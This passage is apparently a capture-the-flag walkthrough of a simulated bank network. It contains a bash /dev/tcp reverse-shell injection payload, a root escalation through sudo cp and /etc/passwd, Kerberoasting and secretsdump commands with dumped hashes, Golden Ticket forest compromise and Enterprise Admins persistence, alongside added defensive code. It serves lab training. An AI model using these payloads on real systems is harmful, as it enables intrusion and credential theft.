sndbuf 0
rcvbuf 0
remote 10.200.X.X 1194
resolv-retry infinite
nobind
persist-key
persist-tun
                                                                                                   
┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/VPN]
└─$ head laura.wood@corp.thereserve.loc.ovpn 
client
dev tun
proto tcp
sndbuf 0
rcvbuf 0
remote 10.200.113.12 1194
resolv-retry infinite
nobind
persist-key
persist-tun

Connecting with laura.wood's file, we did not see anything interesting in the output, but with mohammad.ahmed's file we see a couple of new IPs. Routes to these IPs are added automatically.

Foothold on VPN Machine

To understand how the web server retrieves the files from the back end, we can capture the requests with Burp Suite and analyze the responses.

Looking at the response, it seems like the server appends the .ovpn extension to anything we search for. Carrying out a Path/Directory Traversal attack might not be the best option for us here.

The server does the same when we try to inject a command such as id or whoami into the filename parameter. After trying different command injection techniques, we found that the parameter is vulnerable to blind command injection: when we inject a sleep command, the server waits for the number of seconds we specify before sending the response.

With confidence that it is vulnerable to command injection, we can send a reverse shell payload and try to catch a shell on our attack machine.

bash -i >& /dev/tcp/10.50.110.229/443 0>&1

# URL encoded
%26%26+bash+-i+>%26+/dev/tcp/10.50.110.229/443+0>%261

We will send the above payload and start a Netcat listener to catch the shell.

Great! We got the shell on the VPN machine.
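The root cause here is a filename parameter that reaches a shell with the user's input spliced into the command line. We never saw the portal's own code, so the following is an added example in Python, not the room's or the portal's implementation, of how the same "give me <username>.ovpn" feature is written so that the input can never be interpreted: a strict allow-list for the username, a path check that proves the resulting file stays inside the profile directory, and profile generation done in-process with no shell at all. The function names, the allow-list pattern, the template text and the base directory are assumptions.

```python
"""Input handling for a "generate my OpenVPN profile" endpoint, done without
a shell.

Added example, not the VPN portal's actual code (which we never saw), and not
part of the TryHackMe room. Function names, the allow-list pattern, the
template text and the base directory are assumptions for illustration.
"""
import re
from pathlib import Path
from typing import Dict, List

# Allow-list: letters, digits, dot, underscore, @ and hyphen; must start with a
# letter or digit. Anything a shell or path would interpret (space, ;, &, |,
# $, `, /, newline ...) simply cannot appear.
USERNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._@-]{0,127}$")

# Constructed template, modelled on the head of the .ovpn files shown above.
TEMPLATE = """client
dev tun
proto tcp
sndbuf 0
rcvbuf 0
remote {remote_ip} 1194
resolv-retry infinite
nobind
persist-key
persist-tun
"""


def validate_username(value: str) -> str:
    """Return the value unchanged if it is safe to use as a file-name stem."""
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("username contains characters outside the allow-list")
    if ".." in value:
        # belt and braces: never let a '..' sequence reach a path operation
        raise ValueError("username may not contain '..'")
    return value


def ovpn_path(base_dir: str, username: str) -> Path:
    """Build <base_dir>/<username>.ovpn and prove it stays inside base_dir."""
    base = Path(base_dir).resolve()
    target = (base / f"{validate_username(username)}.ovpn").resolve()
    if target.parent != base:
        raise ValueError("resolved path escaped the profile directory")
    return target


def render_profile(username: str, remote_ip: str) -> str:
    """Fill the template in-process; no shell, no string-concatenated command."""
    validate_username(username)
    return TEMPLATE.format(remote_ip=remote_ip)


def triage(candidates: List[str]) -> Dict[str, str]:
    """Classify each candidate input as accepted or rejected."""
    verdicts = {}
    for c in candidates:
        try:
            validate_username(c)
            verdicts[c] = "accepted"
        except ValueError:
            verdicts[c] = "rejected"
    return verdicts


if __name__ == "__main__":
    for name, verdict in triage([
        "laura.wood@corp.thereserve.loc",
        "x && sleep 5",
        "../../etc/passwd",
        "a;id",
    ]).items():
        print(f"{verdict:8} {name!r}")
```

Two design choices matter. First, the allow-list is positive (what is permitted) rather than a blocklist of shell metacharacters, so URL-encoded or exotic separators do not get through by omission. Second, the file is produced by string formatting rather than by invoking a generator command, so even a validation bug has no shell to reach.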

Connecting to MySQL

In the /var/www/html directory, we notice a database connection configuration file. Such files usually contain database credentials, and reading this one does give us the credentials for the MySQL server.

www-data@ip-10-200-113-12:/var/www/html$ cat db_connect.php 
<?php

define('DB_SRV', 'localhost');
define('DB_PASSWD', "password1!");
define('DB_USER', 'vpn');
define('DB_NAME', 'vpn');

$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);

if($connection == false){

	die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>

From the VPN machine itself, we can connect via MySQL and check out the database.

www-data@ip-10-200-113-12:/var/www/html$ mysql -u vpn -p

The vpn database has a users table that contains a set of credentials for the user lisa.moore. We will add these credentials to our list of found credentials and use them later if needed.

Privilege Escalation

The VPN machine is our foothold on the network. We can set up pivoting and interact with the machines on the internal network directly from our Kali (attack) machine. Getting root access will give us elevated privileges on the machine, and if needed we will be able to install, compile, and run tools without restrictions.

For Pivoting, privilege escalation is not required. We will try to compromise as much as we can to showcase the vulnerabilities and misconfigurations on the machine.

Checking the sudo permissions, we notice that the www-data user can run a bash script and the cp binary with elevated access. We can use this to our advantage and get root access.

The cp binary copies files. We are currently the www-data user, the default account for web servers, which has no elevated privileges by default. With sudo permissions on the cp binary, however, we can copy any file that only the root user can access and read it.

One easy way to become root with sudo permissions on /bin/cp is to modify the /etc/passwd file. We first copy the passwd file to the /tmp directory, add our own user with root privileges, and then copy the file back to its original path.

We will create a hash in the format that is required by the passwd file.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ openssl passwd -1 -salt ignite pass123
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1

Now, we append our user's entry to the passwd file.

The final step is to copy the file back to its original place.

We were able to replace the file and switch to our newly created user. We can also see that we have root privileges on the machine now.
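Both halves of this escalation leave artefacts a defender can check for: a sudoers rule granting a low-privileged account NOPASSWD access to a file-writing binary, and an /etc/passwd entry with UID 0 that carries its password hash inline instead of deferring to /etc/shadow. The following added example (not part of the room) audits constructed /etc/passwd and sudoers excerpts for exactly those conditions. The planted account name "ignite", the hash (the one generated above), the script path /opt/placeholder.sh and the list of file-writing binaries are all assumptions for this example.

```python
"""Audit /etc/passwd content and sudoers rules for the abuse shown above.

Added example, not part of the TryHackMe room. The sample passwd and sudoers
text is constructed (the 'ignite' hash is the one generated above), and the
script path /opt/placeholder.sh stands in for the unnamed script; the
function names and the list of file-writing binaries are assumptions.
"""
from typing import Dict, List

# Constructed /etc/passwd excerpt: normal entries plus the planted account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
ignite:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
"""

# Constructed sudoers excerpt; the script path is a placeholder.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /bin/cp, /opt/placeholder.sh
"""

# Binaries that can write arbitrary files as root and therefore turn a sudo
# rule into full root (assumption: a short, non-exhaustive list).
FILE_WRITERS = {"cp", "mv", "tee", "dd", "install"}


def audit_passwd(text: str) -> Dict[str, List[str]]:
    """Return accounts with UID 0 besides root, accounts carrying a password
    hash inline (instead of 'x' pointing at /etc/shadow), and malformed lines."""
    extra_root, inline_hash, malformed = [], [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            malformed.append(line)
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            extra_root.append(name)
        if passwd not in ("x", "*", "!", ""):
            inline_hash.append(name)
    return {"extra_root": extra_root, "inline_hash": inline_hash, "malformed": malformed}


def audit_sudoers(text: str) -> List[str]:
    """Return 'user -> binary' strings for NOPASSWD rules on file-writing tools."""
    risky = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        user, _, rest = line.partition(" ")
        if "NOPASSWD:" not in rest:
            continue
        commands = rest.split("NOPASSWD:", 1)[1]
        for cmd in commands.split(","):
            path = cmd.strip().split(" ")[0]
            if path.rsplit("/", 1)[-1] in FILE_WRITERS:
                risky.append(f"{user} -> {path}")
    return risky


def run_sample() -> Dict[str, object]:
    """Run both audits over the constructed excerpts."""
    return {"passwd": audit_passwd(SAMPLE_PASSWD),
            "sudoers": audit_sudoers(SAMPLE_SUDOERS)}


if __name__ == "__main__":
    for key, value in run_sample().items():
        print(key, value)
```

On a real host the same checks belong in file-integrity monitoring (a changed /etc/passwd with an added UID 0 line is a high-confidence signal) and in a periodic sudoers review; the www-data rule above is the misconfiguration that made the whole escalation possible.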

Ping Sweep

We have NMAP already installed on the VPN machine. Since this machine can talk to the Internal network, we can quickly run a ping sweep and find all the active hosts on the network.

root@ip-10-200-113-12:~# nmap -sn 10.200.113.0/24 

We found the IP addresses of the following live hosts:

10.200.113.11 Webmail
10.200.113.12 VPN
10.200.113.13 WEB
10.200.113.21 WRK1
10.200.113.22 WRK2
10.200.113.31
10.200.113.32
10.200.113.51
10.200.113.52
10.200.113.61
10.200.113.100
10.200.113.101
10.200.113.102 CORPDC
10.200.113.201

Recall that we already saw the .21 and .22 hosts in the OpenVPN connection output for mohammad.ahmed. The network map also shows more active hosts. We will start enumerating them, but first we need to set up pivoting.

Pivoting Setup

We will use Chisel to set up Pivoting. Our Kali (attack) machine will serve as a server and the VPN machine will act as a client. We should be able to interact with the machines in the internal network directly from our machine after setting up pivoting.

On our Machine:

On VPN Machine:

Breaching the Perimeter

WRK1 Machine

We will begin by running an NMAP scan to find the open ports and services.

NMAP

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone/WRK1]
└─$ nmap -p22,135,139,445,3389 WRK1.corp.thereserve.loc -A -oN nmap/wrk1-fullscan -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 12:12 CST
Nmap scan report for WRK1.corp.thereserve.loc (10.200.113.21)
Host is up (0.52s latency).

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 21:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f (RSA)
|   256 e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a (ECDSA)
|_  256 bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58 (ED25519)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-06T18:13:47+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
| Not valid before: 2024-02-04T20:26:11
|_Not valid after:  2024-08-05T20:26:11
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WRK1
|   DNS_Domain_Name: corp.thereserve.loc
|   DNS_Computer_Name: WRK1.corp.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-02-06T18:13:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-06T18:13:08
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Since RDP is open, we can try connecting with the credentials we have. We can see that we are successfully able to RDP into the WRK1 machine. The same credentials work on the WRK2 machine as well.

At this point, we can submit the proof of compromises and receive the first four flags. Please refer to the section Submitting the Flags above for instructions on connecting to the e-citizen platform and submitting the proof of compromise.

The credentials we have do not work on the Server1 and Server2 machines. We will next try a Kerberoasting attack to find credentials for the Server machines.

Kerberoasting

Kerberoasting is a technique that abuses how the Kerberos authentication protocol, which is commonly used in Windows Active Directory environments for user authentication, issues service tickets. In Kerberoasting attacks, an attacker targets service accounts that use Kerberos to authenticate, such as database or application service accounts.

The attack works by requesting a ticket-granting service (TGS) ticket for a target service account from the Key Distribution Center (KDC) in the Active Directory domain. These service accounts often have a Service Principal Name (SPN) associated with them, which is used for Kerberos authentication. Once the TGS ticket is obtained, the attacker can attempt to crack the ticket’s encryption to extract the account’s password hash.

Once the password hash is obtained, the attacker can then attempt to crack it using offline password-cracking techniques, such as dictionary attacks or brute force attacks. If successful, the attacker gains access to the service account’s credentials, which can be used to further escalate privileges within the network.

GetUserSPNs.py can be used to obtain a password hash for user accounts that have an SPN (service principal name). If an SPN is set on a user account it is possible to request a Service Ticket for this account and attempt to crack it in order to retrieve the user password. This attack is named Kerberoast. This script can also be used for Kerberoast without authentication.

We will use a tool called Impacket-GetUserSPNs to grab Kerberos hashes for the users. We get the hashes for the following users.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ proxychains4 impacket-GetUserSPNs corp.thereserve.loc/laura.wood:'Password1@' -dc-ip 10.200.113.102 -request
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.113.102:389  ...  OK
ServicePrincipalName  Name         MemberOf                                                   PasswordLastSet             LastLogon                   Delegation 
--------------------  -----------  ---------------------------------------------------------  --------------------------  --------------------------  ----------
cifs/scvScanning      svcScanning  CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:07:06.603818  <never>                                
cifs/svcBackups       svcBackups   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:05:59.787089  2023-02-15 03:42:19.327102             
http/svcEDR           svcEDR       CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:21.150738  <never>                                
http/svcMonitor       svcMonitor   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:43.306959  <never>                                
mssql/svcOctober      svcOctober   CN=Internet Access,OU=Groups,DC=corp,DC=thereserve,DC=loc  2023-02-15 03:07:45.563346  2023-03-30 17:26:54.115866 

The output of this will also give us hashes for the above users. We will save the hashes for each user and start cracking them offline.

Hashcat was able to crack only one hash successfully for the service account svcScanning.

Using this account, we can RDP into the Server machines.
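The detection side of the Kerberoasting section above, as an added Python example that is not part of the original write-up: it runs over Windows Security event 4769 (service ticket requested) records and alerts when one client pulls RC4 tickets for several user-account SPNs in a short window, which is exactly the footprint of the -request run above. The event records are constructed dicts; the service names match the SPN table, while the IPs, timestamps and the app.user principal are made up.

```python
"""Detect Kerberoasting from Windows Security event 4769 records.

Added example, not from the original write-up. Events are constructed
dicts carrying the 4769 fields a SIEM would expose; the service names
match the SPN table above, the IPs, timestamps and app.user are made up.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType requested by GetUserSPNs; AES is 0x11/0x12
T0 = datetime(2024, 2, 6, 18, 30, 0)


def ev(offset_s: int, user: str, service: str, etype: str, ip: str) -> dict:
    """Build a constructed 4769 record offset_s seconds after T0."""
    return {"EventID": 4769, "TimeCreated": T0 + timedelta(seconds=offset_s),
            "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip}


SAMPLE_EVENTS = [
    # Normal activity: AES tickets for computer-account services.
    ev(0, "laura.wood@CORP.THERESERVE.LOC", "WRK1$", "0x12", "10.200.113.21"),
    ev(40, "mohammad.ahmed@CORP.THERESERVE.LOC", "CORPDC$", "0x12", "10.200.113.22"),
    # One principal pulling RC4 tickets for every SPN-bearing user account
    # within two seconds: the footprint of the -request run above.
    ev(60, "laura.wood@CORP.THERESERVE.LOC", "svcScanning", "0x17", "10.200.113.12"),
    ev(61, "laura.wood@CORP.THERESERVE.LOC", "svcBackups", "0x17", "10.200.113.12"),
    ev(61, "laura.wood@CORP.THERESERVE.LOC", "svcEDR", "0x17", "10.200.113.12"),
    ev(62, "laura.wood@CORP.THERESERVE.LOC", "svcMonitor", "0x17", "10.200.113.12"),
    ev(62, "laura.wood@CORP.THERESERVE.LOC", "svcOctober", "0x17", "10.200.113.12"),
    # A lone RC4 request for one service is noisy but not an alert by itself.
    ev(900, "app.user@CORP.THERESERVE.LOC", "svcOctober", "0x17", "10.200.113.21"),
]


def is_user_service(service_name: str) -> bool:
    """Computer accounts end in '$' and krbtgt is the KDC itself; only
    SPNs on ordinary user accounts carry a crackable, human-chosen password."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoasting(events: list[dict], window: timedelta = timedelta(minutes=5),
                         min_services: int = 3) -> list[tuple[str, str, list[str]]]:
    """Return (account, client_ip, services) for each client that requested
    RC4 tickets for at least min_services distinct user-account SPNs inside
    one sliding window."""
    buckets: dict[tuple[str, str], list[tuple[datetime, str]]] = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        if not is_user_service(e["ServiceName"]):
            continue
        buckets[(e["TargetUserName"], e["IpAddress"])].append((e["TimeCreated"], e["ServiceName"]))

    alerts = []
    for (account, ip), requests in buckets.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - start <= window}
            if len(in_window) >= min_services:
                alerts.append((account, ip, sorted(in_window)))
                break   # one alert per client is enough
    return alerts


if __name__ == "__main__":
    for account, ip, services in detect_kerberoasting(SAMPLE_EVENTS):
        print(f"possible Kerberoasting by {account} from {ip}: {', '.join(services)}")
```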

Compromising the CORPDC

Service accounts often have more privileges than normal domain users. With the svcScanning account, we can carry out further attacks such as dumping secrets from the AD machines.

For this attack, we will make use of Impacket-secretsdump tool. Let’s try to dump hashes on the Server1 machine.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ proxychains impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.113.31
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.113.31:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90cf5c2fdcffe9d25ff0ed9b3d14a846
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e2c7044e93cf7e4d8697582207d6785c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
THMSetup:1008:aad3b435b51404eeaad3b435b51404ee:d37f688ca5172b5976b714a8b54b40f4:::
HelpDesk:1009:aad3b435b51404eeaad3b435b51404ee:f6ca2f672e731b37150f0c5fa8cfafff:::
sshd:1010:aad3b435b51404eeaad3b435b51404ee:48c62694fd5bbca286168e2199f9af49:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.THERESERVE.LOC/Administrator:$DCC2$10240#Administrator#b08785ec00370a4f7d02ef8bd9b798ca: (2023-04-01 03:13:47)
CORP.THERESERVE.LOC/svcScanning:$DCC2$10240#svcScanning#d53a09b9e4646451ab823c37056a0d6b: (2024-02-06 22:58:50)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
CORP\SERVER1$:aes256-cts-hmac-sha1-96:60db0f5bd8abfee643cae3060ed708e3158426f253e2711f9be068245cee19ac
CORP\SERVER1$:aes128-cts-hmac-sha1-96:3e61a6a2a9f25ada7f7ebd64a3384a9a
CORP\SERVER1$:des-cbc-md5:023dfdfbcd51b6a8
CORP\SERVER1$:plain_password_hex:323da71a677b83100ef8a4555d87c9ed4af979b405f786814bdecc168e16f82b86cf247e0b03bbe01c09b9fa98d5866fe4a09d3fd99a98b4543bdb36fbbe742c05b0e9b4f6795313db4f68c33cc6bc2330a1c4d75311ede155b90f11ebe5ff8409989636083928daf72ecd7f807e47b4eea7741d5ac3c4141ffad6e5663a19a1660a562a0aa72031d25f1229eb4a445016b8a8b7614ed559b78ef9334dcf6dd9442a1ff43d7a3b1a99b4d74906f3b99666a4d277190d06bb76c6905a9fdf03d7a1272903fce0f5c1c7ed7cee1a9332123ffff71fc3d1de00db45845270842b4b33415df5b524e6f0bf1beac6bdf2fb2a
CORP\SERVER1$:aad3b435b51404eeaad3b435b51404ee:ab478e460aa37786571a4d13497c2f47:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb4cfb5032a98c1b279c92264915da1fd3d8b1a0d
dpapi_userkey:0x3cddfc2ba786e51edf1c732a21ffa1f3d19aa382
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] _SC_SYNC 
svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

There are a couple of things from this output that are of most interest to us:

  • The Administrator’s NTLM hash
  • The ClearText password for svcBackups account

Performing the same technique on the CORPDC machine won't work with the svcScanning account.

To perform the same technique and dump secrets from the CORPDC machine, we will use the svcBackups account.

This worked out perfectly fine for us and we now have the NTLM hash for the Administrator user of the CORPDC machine! This is a big achievement. Having the Administrator's hash, we can connect to the CORPDC machine via RDP or WinRM. We can also try to crack the hash offline and find out the password for the Administrator.

When trying to RDP we get a message that the account is not allowed to log in without a password or with a blank password.

We will need a password for the administrator to connect via RDP. Hashcat was not able to crack the hash. Our next option is to connect using evil-winrm.

To get RDP access, we can create a new user as an Administrator.

Changing the Administrator password is not recommended, as it would not be an acceptable option in a real-world pentest engagement.

First, let’s create a user.

Next, we will enumerate the groups to find the group name for the Administrator user.

Finally, we will add our user to this group to make it a Domain Admin.

We can now connect to RDP and submit the proof of compromises. Our network expands further revealing another domain on the network.

Compromising the ROOTDC

Looking at the network topology, we can see that the AD Forest contains two child domains (CORPDC and BANKDC) and a parent domain controller (ROOTDC). Our shortest path to compromising the entire forest would be to compromise the ROOTDC first. This will give us access to the other machines on the network.

We can begin our enumeration by finding out the domain trust relationship between the CORPDC and ROOTDC. To enumerate the domains, we will use PowerView. PowerView is a PowerShell module that provides commands for enumerating the domain.

But first, we will need to get the PowerView script onto the CORPDC machine. To make the file transfer, we will perform the following steps:

  • Host the PowerView.ps1 file on our Kali machine
  • Get the file onto the VPN machine
  • Host the file using a Python web server on the VPN machine
  • Download the file to the CORPDC machine

On our Kali (Attack) Machine:

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On VPN machine:

root@ip-10-200-113-12:/var/www/html# cd /tmp
root@ip-10-200-113-12:/tmp# wget http://10.50.110.229/PowerView.ps1
--2024-02-07 15:15:26--  http://10.50.110.229/PowerView.ps1
Connecting to 10.50.110.229:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [application/octet-stream]
Saving to: ‘PowerView.ps1’

PowerView.ps1       100%[===================>] 752.23K   238KB/s    in 3.2s    

2024-02-07 15:15:30 (238 KB/s) - ‘PowerView.ps1’ saved [770279/770279]

root@ip-10-200-113-12:/tmp# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On CORPDC:

Before trying to get the file on CORPDC, we will need to turn OFF Virus Protection, and also allow our VPN server IP to download files in the browser settings.

We can download the file now and start enumerating the domains.

We can see that there is a bidirectional domain trust between the two domains.

Bidirectional domain trusts allow two Active Directory domains to trust each other, meaning users and resources from one domain can access resources in the other domain, and vice versa. Here are some common ways attackers abuse bidirectional domain trusts:

  1. Pass-the-Ticket (PtT) Attacks: With access to one domain, attackers can use PtT attacks to obtain Ticket Granting Tickets (TGTs) for users in the trusted domain. These TGTs can then be used to authenticate to resources in the trusted domain, allowing the attacker to move laterally.
  2. Pass-the-Hash (PtH) Attacks: Similar to PtT attacks, PtH attacks involve stealing password hashes of privileged accounts in one domain and using them to authenticate to resources in the trusted domain. This allows attackers to move laterally without needing to know the plaintext passwords.
  3. Golden Ticket Attacks: Attackers can forge Kerberos tickets, known as Golden Tickets, using the KRBTGT account’s password hash from one domain and the trust relationship between the domains. With a Golden Ticket, attackers gain unrestricted access to any resource in the trusted domain.
  4. Silver Ticket Attacks: Silver Ticket attacks involve forging Service Principal Name (SPN) tickets to impersonate specific services in the trusted domain. This allows attackers to access resources associated with those SPNs without needing the service account’s credentials.
  5. Abusing AdminSDHolder: If the domains have differing security postures or if the trust is not properly configured, attackers may abuse AdminSDHolder, a mechanism in Active Directory that enforces permissions on sensitive accounts like Domain Admins. By escalating privileges or modifying permissions through AdminSDHolder, attackers can gain unauthorized access to critical accounts and resources in the trusted domain.
  6. Exploiting Misconfigurations: Attackers may look for misconfigurations in the trust relationship, such as weak authentication settings or improper trust permissions. Exploiting these misconfigurations can provide avenues for unauthorized access and lateral movement.

We can go for the Golden Ticket attack and try to impersonate a user (Administrator) with high privileges on the ROOTDC.

Golden Ticket Attack

A Golden Ticket attack is a sophisticated form of cyber attack that involves forging Kerberos tickets to gain unauthorized access to a Windows Active Directory environment. In Kerberos authentication, tickets are used to prove the identity of users and services within the domain. The Ticket Granting Ticket (TGT) is a crucial component in this process, as it grants access to various resources across the domain.

In a Golden Ticket attack, the attacker gains access to the KRBTGT account’s password hash, which is a privileged account used by the Key Distribution Center (KDC) to encrypt TGTs. With the KRBTGT password hash, the attacker can create a forged TGT that grants them unrestricted access to any resource in the Active Directory domain.

The key steps involved in a Golden Ticket attack include:

  1. Obtaining KRBTGT Password Hash: Attackers typically gain access to the KRBTGT password hash through various means, such as compromising a domain controller, using Mimikatz to extract the hash from memory, or exploiting vulnerabilities.
  2. Forging the TGT: Using the KRBTGT password hash, the attacker generates a forged TGT with arbitrary user credentials, group memberships, and privileges. The attacker can set the ticket’s lifetime to a long duration, allowing prolonged access to the domain.
  3. Injecting the TGT: The forged TGT is then injected into the attacker’s session, effectively impersonating a legitimate user with elevated privileges within the domain.
  4. Accessing Resources: With the Golden Ticket in hand, the attacker can access any resource within the domain, including sensitive data, systems, and services. Since the forged TGT contains arbitrary user credentials, the attacker can bypass authentication checks and perform actions as if they were a legitimate user with full domain privileges.

So to carry out this attack we will need:

  • The KRBTGT password hash
  • The Security Identifier (SID) of the (CORPDC) Domain
  • The user account we want to impersonate (Administrator)

To make our attack more advanced, we can also inject the SID for the Enterprise Admins group so that the user we impersonate would have high privileges. This will give us access to all the machines in the entire Forest if we are successful in doing so.

Let’s get the SIDs for the CORPDC and the Enterprise Admins group.

To get the KRBTGT hash and also to forge the Golden Ticket, we will need mimikatz.exe. We will transfer the mimikatz binary the same way we got PowerView onto the CORPDC machine.

Let’s get the KRBTGT hash first.

We now have all the information we need to forge the Golden Ticket which will be injected in our current session.

The output indicates that we have successfully impersonated the user. We can quickly test if our attack worked by trying to list out the shares on the ROOTDC machine.

Great! It worked! We can also get a shell on the ROOTDC using PsExec.exe.

We can submit the proof of compromise and get the flag for the ROOTDC machine.

For persistence, we can create a new user and add it to the Enterprise Admins group so that we will have elevated privileges on all the domains. We can either use the below PowerShell commands or use the GUI on CORPDC.

# Quoted so the trailing @ is taken literally; $pwd itself is a PowerShell automatic variable, so use another name
$Password = ConvertTo-SecureString 'Capstone1@' -AsPlainText -Force

# New-ADUser creates the account disabled unless -Enabled $true is given
New-ADUser -Name ishsomeroot -AccountPassword $Password -Enabled $true

# Look the new user up on the child DC it was created on
$User = Get-ADUser -Identity ishsomeroot -Server "corpdc.corp.thereserve.loc"

# Enterprise Admins lives in the forest root domain, so query ROOTDC for it
$Group = Get-ADGroup -Identity "Enterprise Admins" -Server "rootdc.thereserve.loc"

# The membership change must be written on ROOTDC as well
Add-ADGroupMember -Identity $Group -Members $User -Server "rootdc.thereserve.loc"

  • We will create a user called ishsome
  • Add this user to the Enterprise Admins and Remote Desktop Users group
  • Use RDP to connect to all other machines on the network

Compromising BANKDC

We should be able to connect to BANKDC now and submit the proof of compromise.

At this point, we have compromised all three domains. We have the highest privileges in the domain and we own all the Domain Controllers, users, and computers for the entire AD Forest. This is a huge achievement for a Red Teamer.

The goal of this challenge is to show the impact of the compromise. Our final goal is to make a fraudulent transaction and compromise the SWIFT banking system.

Compromising SWIFT Banking System

Accessing the application from the JMP machine shows us the following web page.

To get instructions on how to proceed, we can go to the e-citizen platform and select option 17 (rather than the option for submitting a proof of compromise). We get the below instructions.

In order to proof that you have access to the SWIFT system, dummy accounts have been created for you and you will have to perform the following steps to prove access.
===============================================
Account Details:
Source Email:		ishsome36@source.loc
Source Password:	T9nscPQYAnD-Jw
Source AccountID:	65c82460599a22214d185b31
Source Funds:		$ 10 000 000

Destination Email:	ishsome36@destination.loc
